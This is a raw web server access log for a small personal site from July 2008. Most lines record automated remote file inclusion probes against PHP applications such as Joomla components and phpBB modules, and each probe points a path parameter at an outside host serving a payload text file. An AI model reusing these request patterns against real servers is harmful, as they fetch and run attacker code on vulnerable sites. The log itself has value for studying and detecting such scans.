83.12.119.178 - - [30/Jul/2008:23:24:20 -0500] "GET /logs//atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
85.239.113.1 - - [30/Jul/2008:23:24:28 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:23:24:28 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:23:24:28 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
125.254.71.46 - - [30/Jul/2008:23:25:29 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com.au/search?um=1&hl=en&safe=off&q=vintage%20tattoo%20flash&ie=UTF-8&sa=N&tab=iw""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.2"
125.254.71.46 - - [30/Jul/2008:23:25:29 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.2"
125.254.71.46 - - [30/Jul/2008:23:25:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.2"
125.254.71.46 - - [30/Jul/2008:23:25:29 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.2"
202.30.194.70 - - [30/Jul/2008:23:26:42 -0500] "GET /logs/access_log.1216598400//netcat/require/index.php?ROOT_FOLDER=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
202.30.194.70 - - [30/Jul/2008:23:26:42 -0500] "GET /logs//netcat/require/index.php?ROOT_FOLDER=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
202.30.194.70 - - [30/Jul/2008:23:26:42 -0500] "GET //netcat/require/index.php?ROOT_FOLDER=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
74.6.18.231 - - [30/Jul/2008:23:29:10 -0500] "GET /logs/access_log.1190246400 HTTP/1.0" 200 125221 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.19.81.18 - - [30/Jul/2008:23:30:27 -0500] "GET /logs/access_log.1207785600//login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:23:31:15 -0500] "GET /logs/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
67.19.81.18 - - [30/Jul/2008:23:31:15 -0500] "GET /logs/access_log.1214438400//login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:23:31:15 -0500] "GET /?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
67.19.81.18 - - [30/Jul/2008:23:31:25 -0500] "GET //login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.19.81.18 - - [30/Jul/2008:23:31:30 -0500] "GET /logs//login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.19.81.18 - - [30/Jul/2008:23:31:30 -0500] "GET /logs/access_log.1207785600//login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:23:31:50 -0500] "GET /logs/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:23:31:51 -0500] "GET /?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
67.19.81.18 - - [30/Jul/2008:23:32:17 -0500] "GET /logs/access_log.1214438400//login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.146.61.130 - - [30/Jul/2008:23:33:52 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:33:52 -0500] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:34:10 -0500] "GET /logs/access_log.1207785600//login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:34:22 -0500] "GET /logs/access_log.1214438400//login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
216.81.239.15 - - [30/Jul/2008:23:35:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.81.239.15 - - [30/Jul/2008:23:35:06 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
203.211.149.166 - - [30/Jul/2008:23:36:48 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://tsunamibot.t35.com/on.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.813"
203.211.149.166 - - [30/Jul/2008:23:36:49 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://tsunamibot.t35.com/on.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.813"
189.102.16.28 - - [30/Jul/2008:23:37:39 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
189.102.16.28 - - [30/Jul/2008:23:37:39 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
200.146.61.130 - - [30/Jul/2008:23:39:17 -0500] "GET /logs/access_log.1207785600//login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:39:36 -0500] "GET /logs/access_log.1214438400//login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
81.9.63.18 - - [30/Jul/2008:23:39:52 -0500] "GET /logs/access_log.1214438400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.proxi-com.ru/images/mail.gif?? HTTP/1.1" 404 383 "-""libwww-perl/5.811"
81.9.63.18 - - [30/Jul/2008:23:43:44 -0500] "GET /logs/access_log.1212883200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.proxi-com.ru/images/mail.gif?? HTTP/1.1" 404 383 "-""libwww-perl/5.811"
85.239.113.1 - - [30/Jul/2008:23:46:55 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:23:46:55 -0500] "GET /phphtml.php?htmlclass_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:23:46:56 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
169.244.70.148 - - [30/Jul/2008:23:47:44 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/nuklir2/test.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
169.244.70.148 - - [30/Jul/2008:23:47:44 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/nuklir2/test.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
67.19.81.18 - - [30/Jul/2008:23:48:37 -0500] "GET /logs//home.php?action=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.19.81.18 - - [30/Jul/2008:23:48:37 -0500] "GET //home.php?action=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.211.149.166 - - [30/Jul/2008:23:49:12 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://tsunamibot.t35.com/on.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.813"
67.19.81.18 - - [30/Jul/2008:23:49:15 -0500] "GET //home.php?action=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.19.81.18 - - [30/Jul/2008:23:49:17 -0500] "GET /logs//home.php?action=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
189.102.16.28 - - [30/Jul/2008:23:50:11 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.808"
189.102.16.28 - - [30/Jul/2008:23:50:11 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
65.55.208.138 - - [30/Jul/2008:23:50:45 -0500] "GET /logs/access_log.1194134400 HTTP/1.1" 200 176724 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.22.89.194 - - [30/Jul/2008:23:53:57 -0500] "GET /logs/access_log.1213142400%20/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
64.22.89.194 - - [30/Jul/2008:23:53:57 -0500] "GET /errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
64.22.89.194 - - [30/Jul/2008:23:53:57 -0500] "GET /logs/access_log.1213315200%20/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
64.22.89.194 - - [30/Jul/2008:23:53:57 -0500] "GET /logs/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
72.232.71.106 - - [30/Jul/2008:23:54:04 -0500] "GET /logs/access_log.1213142400%20/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
72.232.71.106 - - [30/Jul/2008:23:54:04 -0500] "GET /errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
72.232.71.106 - - [30/Jul/2008:23:54:04 -0500] "GET /logs/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
72.232.71.106 - - [30/Jul/2008:23:54:04 -0500] "GET /logs/access_log.1213315200%20/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
69.93.189.130 - - [30/Jul/2008:23:54:37 -0500] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.93.189.130 - - [30/Jul/2008:23:54:38 -0500] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
193.207.106.54 - - [30/Jul/2008:23:55:50 -0500] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.207.106.54 - - [30/Jul/2008:23:55:50 -0500] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
193.207.106.54 - - [30/Jul/2008:23:55:51 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
69.73.136.95 - - [30/Jul/2008:23:56:23 -0500] "GET /logs///?custompluginfile%5B%5D=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 200 93421 "-""libwww-perl/5.805"
69.73.136.95 - - [30/Jul/2008:23:56:23 -0500] "GET ///?custompluginfile%5B%5D=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 200 1244 "-""libwww-perl/5.805"
80.74.146.175 - - [30/Jul/2008:23:57:16 -0500] "GET /?INCLUDE_FOLDER=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
80.74.146.175 - - [30/Jul/2008:23:57:17 -0500] "GET /logs/?INCLUDE_FOLDER=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
69.65.33.36 - - [30/Jul/2008:23:58:03 -0500] "GET /errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
201.36.250.17 - - [30/Jul/2008:23:59:04 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.800"
201.36.250.17 - - [30/Jul/2008:23:59:04 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.800"
69.93.189.130 - - [30/Jul/2008:23:59:42 -0500] "GET /?INCLUDE_FOLDER=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
69.93.189.130 - - [30/Jul/2008:23:59:43 -0500] "GET /logs/?INCLUDE_FOLDER=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 200 93415 "-""libwww-perl/5.810"
189.102.16.28 - - [31/Jul/2008:00:00:12 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:00:00:12 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
72.9.145.107 - - [31/Jul/2008:00:02:23 -0500] "GET /logs//errors.php?error=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
72.9.145.107 - - [31/Jul/2008:00:02:23 -0500] "GET //errors.php?error=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
72.9.145.107 - - [31/Jul/2008:00:02:46 -0500] "GET /logs//errors.php?error=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
72.9.145.107 - - [31/Jul/2008:00:02:46 -0500] "GET //errors.php?error=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
74.53.240.146 - - [31/Jul/2008:00:05:41 -0500] "GET /logs/errors.php?error=http://hades.pdg.pl/VooPrivateStuff/respone.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:00:05:41 -0500] "GET /errors.php?error=http://hades.pdg.pl/VooPrivateStuff/respone.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.254.226.234 - - [31/Jul/2008:00:06:26 -0500] "GET /logs//errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
213.254.226.234 - - [31/Jul/2008:00:06:26 -0500] "GET //errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
203.211.149.166 - - [31/Jul/2008:00:07:28 -0500] "GET /logs/access_log.1214438400/includes/ktedit/toolbar.php?dirDepth=http://tsunamibot.t35.com/on.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.813"
203.211.149.166 - - [31/Jul/2008:00:07:29 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://tsunamibot.t35.com/on.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.813"
203.211.149.166 - - [31/Jul/2008:00:07:29 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://tsunamibot.t35.com/on.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.813"
200.146.61.130 - - [31/Jul/2008:00:09:01 -0500] "GET /logs/errors.php?error=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:09:02 -0500] "GET /errors.php?error=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
85.214.59.54 - - [31/Jul/2008:00:11:28 -0500] "GET /logs/access_log.1212883200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
85.214.59.54 - - [31/Jul/2008:00:11:28 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
85.214.59.54 - - [31/Jul/2008:00:11:29 -0500] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
62.244.71.72 - - [31/Jul/2008:00:11:49 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
62.244.71.72 - - [31/Jul/2008:00:11:49 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
62.244.71.72 - - [31/Jul/2008:00:12:22 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.244.71.72 - - [31/Jul/2008:00:12:22 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.244.71.72 - - [31/Jul/2008:00:12:22 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.244.71.72 - - [31/Jul/2008:00:12:23 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.19.81.18 - - [31/Jul/2008:00:12:37 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
81.0.228.184 - - [31/Jul/2008:00:12:38 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
67.19.81.18 - - [31/Jul/2008:00:12:42 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
62.244.71.72 - - [31/Jul/2008:00:13:17 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
62.244.71.72 - - [31/Jul/2008:00:13:17 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 345 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
62.244.71.72 - - [31/Jul/2008:00:13:17 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 345 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
62.244.71.72 - - [31/Jul/2008:00:13:17 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
62.244.71.72 - - [31/Jul/2008:00:13:35 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
62.244.71.72 - - [31/Jul/2008:00:13:35 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
62.244.71.72 - - [31/Jul/2008:00:13:35 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
74.54.108.98 - - [31/Jul/2008:00:15:27 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.54.108.98 - - [31/Jul/2008:00:15:27 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.54.108.98 - - [31/Jul/2008:00:15:49 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.54.108.98 - - [31/Jul/2008:00:15:49 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
67.15.186.5 - - [31/Jul/2008:00:16:53 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
67.15.186.5 - - [31/Jul/2008:00:16:53 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
67.15.186.5 - - [31/Jul/2008:00:16:54 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
67.15.186.5 - - [31/Jul/2008:00:17:33 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
67.15.186.5 - - [31/Jul/2008:00:17:36 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
67.15.186.5 - - [31/Jul/2008:00:17:36 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
67.15.186.5 - - [31/Jul/2008:00:17:37 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.54.108.98 - - [31/Jul/2008:00:17:40 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
74.54.108.98 - - [31/Jul/2008:00:17:40 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 323 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
74.54.108.98 - - [31/Jul/2008:00:17:40 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 318 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
74.54.108.98 - - [31/Jul/2008:00:17:40 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
67.15.186.5 - - [31/Jul/2008:00:17:51 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 323 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.15.186.5 - - [31/Jul/2008:00:17:51 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 318 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.15.186.5 - - [31/Jul/2008:00:17:51 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 345 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.0.228.184 - - [31/Jul/2008:00:18:07 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
